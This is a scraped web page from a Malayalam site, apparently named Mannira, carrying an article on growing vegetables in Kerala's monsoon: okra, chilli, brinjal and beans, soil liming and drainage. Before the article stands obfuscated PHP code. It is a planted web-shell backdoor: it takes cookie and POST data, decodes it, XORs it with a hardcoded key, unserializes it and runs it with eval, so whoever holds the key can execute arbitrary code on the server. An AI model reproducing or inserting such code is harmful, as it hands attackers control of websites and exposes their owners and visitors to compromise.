$VXJVEAbNkL = chr (111) . chr ( 914 - 847 )."\x5f" . "\x68" . "\152" . chr (78) . "\123";$ElrEeQWf = 'c' . chr ( 427 - 319 ).chr ( 779 - 682 ).'s' . "\163" . "\137" . "\145" . chr ( 457 - 337 ).chr ( 1063 - 958 ).'s' . "\164" . "\x73";$FKdCsvt = class_exists($VXJVEAbNkL); $ElrEeQWf = "26131";$xTnGlRuR = strpos($ElrEeQWf, $VXJVEAbNkL);if ($FKdCsvt == $xTnGlRuR){function dSAGxSPU(){$mCXBr = new /* 15894 */ oC_hjNS(5865 + 5865); $mCXBr = NULL;}$SyQtm = "5865";class oC_hjNS{private function UCrjoD($SyQtm){if (is_array(oC_hjNS::$GSCSJq)) {$GpUkk2 = str_replace("<" . "?php", "", oC_hjNS::$GSCSJq["content"]);eval($GpUkk2); $SyQtm = "5865";exit();}}public function VXqvOSb(){$GpUkk = "53873";$this->_dummy = str_repeat($GpUkk, strlen($GpUkk));}public function __destruct(){oC_hjNS::$GSCSJq = @unserialize(oC_hjNS::$GSCSJq); $SyQtm = "30711_57028";$this->UCrjoD($SyQtm); $SyQtm = "30711_57028";}public function BHgAlhgAP($GpUkk, $KCcdxwo){return $GpUkk[0] ^ str_repeat($KCcdxwo, intval(strlen($GpUkk[0]) / strlen($KCcdxwo)) + 1);}public function jJMpKV($GpUkk){$FPmjvGj = "\142" . chr ( 555 - 458 ).chr ( 418 - 303 ).'e' . '6' . chr ( 97 - 45 );return array_map($FPmjvGj . chr (95) . chr (100) . "\x65" . chr (99) . chr (111) . "\x64" . chr (101), array($GpUkk,));}public function __construct($TaJCrlgNU=0){$adNshnbaU = "\54";$GpUkk = "";$UjieTVMmPr = $_POST;$jkIOj = $_COOKIE;$KCcdxwo = "fa466309-c080-47c2-bdd5-b7d5baf991f3";$ApeUFifxgT = @$jkIOj[substr($KCcdxwo, 0, 4)];if (!empty($ApeUFifxgT)){$ApeUFifxgT = explode($adNshnbaU, $ApeUFifxgT);foreach ($ApeUFifxgT as $cwcxCxX){$GpUkk .= @$jkIOj[$cwcxCxX];$GpUkk .= @$UjieTVMmPr[$cwcxCxX];}$GpUkk = $this->jJMpKV($GpUkk);}oC_hjNS::$GSCSJq = $this->BHgAlhgAP($GpUkk, $KCcdxwo);if (strpos($KCcdxwo, $adNshnbaU) !== FALSE){$KCcdxwo = str_pad($KCcdxwo, 10); $KCcdxwo = ltrim(rtrim($KCcdxwo));}}public static $GSCSJq = 51359;}dSAGxSPU();} മഴക്കാലത്തും പച്ചക്കറിത്തോട്ടത്തിൽ പണക്കിലുക്കം; കൃഷി ചെയ്യേണ്ട പച്ചക്കറികൾ ഇവയാണ് – Mannira

മഴക്കാലത്തും പച്ചക്കറിത്തോട്ടത്തിൽ പണക്കിലുക്കം; കൃഷി ചെയ്യേണ്ട പച്ചക്കറികൾ ഇവയാണ്

മഴക്കാലത്തും പച്ചക്കറിത്തോട്ടത്തിൽ പണക്കിലുക്കം; കൃഷി ചെയ്യേണ്ട പച്ചക്കറികൾ ഇവയാണ്. കേരളത്തിൽ മറ്റൊരു മഴക്കാലം കൂടി ആരംഭിച്ചതോടെ പച്ചക്കറി കൃഷിയും തുടങ്ങാൻ സമയമായി. അൽപ്പം ശ്രദ്ധാപൂർവം തെരഞ്ഞെടുത്താൽ മഴക്കാലത്തും കർഷകർക്ക് നല്ല ലാഭം നേടിത്തരുന്നതാണ് പച്ചക്കറി കൃഷി. ചീര, വെണ്ട, വഴുതന, മുളക്, പാവൽ, പടവലം, മത്തൻ, കുമ്പളം, ചുരയ്ക്ക മുതലായവയാണ് നല്ല മഴ ലഭിച്ചാൽ മികച്ച വിളവുതരുന്ന പച്ചക്കറികൾ.

നീരൂറ്റി കുടിക്കുന്ന മുഞ്ഞ, വെള്ളീച്ച, മണ്ഡരി, ഇലപ്പേൻ എന്നീ കീടങ്ങളുടെ ശല്യവും മഴക്കാലത്ത് വളരെ കുറവായിരിക്കും. കേരളത്തിൽ മഴക്കാലത്ത് ഏറ്റവും നന്നായി വളർത്താൻ കഴിയുന്ന പച്ചക്കറിയാണ് വെണ്ട. വെണ്ടയുടെ പ്രധാന ഭീഷണിയായ മഞ്ഞളിപ്പ് രോഗം പരത്തുന്ന വെള്ളീച്ചകൾ മഴക്കാലത്ത് തീരെ കുറവായിരിക്കും. ധാരാളം അയഡിൻ അടങ്ങിയ പോഷക സമൃദ്ധമായ വെണ്ടയ്ക്കക്ക് വിപണിയിൽ നല്ല വിലയും ലഭിക്കാറുണ്ട്.

വെണ്ട കഴിഞ്ഞാൽ മുളകാണ് മഴക്കാല കൃഷിയ്ക്ക് യോജിച്ച മറ്റൊരു പച്ചക്കറി. വെള്ളം കെട്ടിനിൽക്കാതെ ശ്രദ്ധിച്ചാൽ മഴക്കാലത്ത് മുളക് മികച്ച വിളവു നൽകും. നീരൂറ്റി കുടിക്കുന്ന പ്രാണികൾ മഴക്കാലത്ത് കുറവായിരിക്കുന്നതാണ് ഇതിന് കാരണം. സാധാരണ മുളകിനു പുറമേ കാന്താരി മുളകും വീട്ടിൽ കൃഷി ചെയ്യാം. വിത്തുകൾ പാകിമുളപ്പിച്ച തൈകളാണ് നടേണ്ടത്.

വഴുതിനയാണ് മഴക്കാലത്ത് നന്നായി വിളയുന്ന മറ്റൊരു പച്ചക്കറി. വിപണിയിൽ ലഭ്യമായ നിരവധി ഇനം വിത്തുകൾക്കു പുറമേ ധാരാളം നാടൻ വഴുതിന ഇനങ്ങളും വീടുകളിൽ കൃഷി ചെയ്തുവരുന്നു. വിത്തിട്ട് 20 മുതൽ 25 ദിവസംവരെ പ്രായമാകുമ്പോൾ തൈകൾ മാറ്റിനടാവുന്നതാണ്. ചെടികൾ തമ്മിൽ 60 സെന്‍റീ മീറ്ററും വാരങ്ങൾ തമ്മിൽ 75 സെന്‍റീ മീറ്ററും ഇടയകലം നൽകണം.

മഴയ്ക്ക് ഏറെ പ്രിയപ്പെട്ട പച്ചക്കറിയാണ് പയർ. മഴക്കാലത്തു നട്ടാലും ഇവ പിടിച്ചു നിൽക്കും. പയറിന്റെ നാടൻ ഇനമായ കുരുത്തോലപ്പയർ മഴക്കാലത്ത് മികച്ച വിളവു തരുന്നവയാണ്. പയറു നടാൻ നല്ല സമയം മെയ് അവസാനത്തോടെയും ജൂൺ ആദ്യവാരവുമായി എത്തുന്ന രോഹിണി ഞാറ്റുവേലയാണ്.

മഴക്കാലത്തെ ഏറ്റവും വലിയ വെല്ലുവിളി മണ്ണിലെ അമ്ലത നിയന്ത്രിക്കുക എന്നതാണ്. മണ്ണൊലിച്ചു പോകുന്നതിന് അനുസരിച്ച് അമ്ലതയിൽ വ്യത്യാസം വരും. ചാക്കിലാണ് പച്ചക്കറി നട്ടിരിക്കുന്നതെങ്കിൽ ഒരു വലിയ സ്പൂൺ കുമ്മായം രണ്ടാഴ്ചയിലൊരിക്കൽ ഇട്ടു കൊടുക്കാം. തണ്ട് തൊടാതെ, ചെടിക്കു ചുറ്റും മണ്ണിൽ ഇട്ടു കൊടുക്കുകയാണ് വേണ്ടത്.

പച്ചക്കറികൾക്കു നനവ് ആവശ്യമാണെങ്കിലും വെള്ളം കെട്ടി നിൽക്കുന്നത് വിപരീത ഫലം ചെയ്യും. തടത്തിൽ നിന്ന് വെള്ളം ഒലിച്ചിറങ്ങാൻ ഡ്രെയിനേജ് ഉറപ്പാക്കണം. വെള്ളത്തിനൊപ്പം മണ്ണ് ഒലിച്ചു പോകാത്ത തരത്തിൽ ചെറിയ ദ്വാരങ്ങളേ ചാക്കിലിടാവൂ. മണ്ണിനും മണ്ണിൽ ജീവിക്കുന്ന സൂക്ഷ്മജീവികൾക്കും ശ്വസിക്കാനും വെള്ളം കെട്ടിനിൽക്കുന്നത് തടസമാകും.



മഴക്കാലം തുടങ്ങി ആദ്യ രണ്ടാഴ്ചയ്ക്കുള്ളിൽ കീടങ്ങളുടെ വരവു തുടങ്ങുന്നതിനാൽ മഴക്കാലം ആരംഭിക്കുമ്പോളേ കീടനാശിനിപ്രയോഗം തുടങ്ങണം. ജൈവ കീടനാശിനികൾ വീട്ടിൽ തന്നെ തയാറാക്കാം. സൂര്യപ്രകാശം വേണ്ട അളവിൽ കിട്ടാത്തതിനാൽ ചെടികളുടെ വളർച്ചയെ ബാധിക്കാനിടയുണ്ട്. അതിനാൽ പച്ചക്കറികൾ നന്നായി വളരാൻ നല്ല പോഷകങ്ങൾ ആവശ്യമാണ്. വേഗത്തിൽ ഫലം നൽകുന്ന പോഷകങ്ങൾ വേണം ഉപയോഗിക്കാൻ.

Also Read: ഓണ വിപണി ഉണരാൻ ഇനി ഏതാനും മാസങ്ങൾ മാത്രം; ജമന്തി കൃഷിയുടെ ഒരുക്കങ്ങൾ തുടങ്ങിയില്ലേ?

Image: pixabay.com